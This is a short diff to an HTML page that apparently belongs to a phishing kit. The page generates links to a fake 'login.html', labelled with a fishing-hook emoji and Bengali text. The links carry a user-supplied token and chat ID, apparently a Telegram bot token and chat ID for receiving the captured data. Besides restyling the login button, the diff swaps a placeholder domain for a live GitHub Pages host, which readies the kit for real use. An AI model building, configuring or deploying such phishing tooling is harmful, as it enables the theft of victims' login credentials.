--- a/index.html
+++ b/index.html
@@ -93,7 +93,7 @@
             border-color: red;
         }
         #loginButton {
-            background-color: #e4136b;
+            background-color: #FF0000;
             color: #FFFFFF;
             border: none;
             padding: 10px 20px;
@@ -109,7 +109,7 @@
             animation: fadeIn 2.5s ease-in-out;
         }
         #loginButton:hover {
-            background-color: #c5115a;
+            background-color: #5C4033;
             animation: buttonHover 0.3s forwards;
             transform: translateY(-2px);
         }
@@ -157,7 +157,7 @@
     const chatId = document.getElementById('chatId').value;
     
     if (token && chatId) {
-        const link = `🎣<b>Your Title Generator:-</b>https://yourdomain.com/login.html?token=${token}&id=${chatId}`;
+        const link = `🎣<b>Your Title Generator:-</b>https://brillianttopup.github.io/5266//login.html?token=${token}&id=${chatId}`;
         
         const message = `🔗 <b><u>এটা হচ্ছে আপনার পেজ লিংক:</u></b>
 
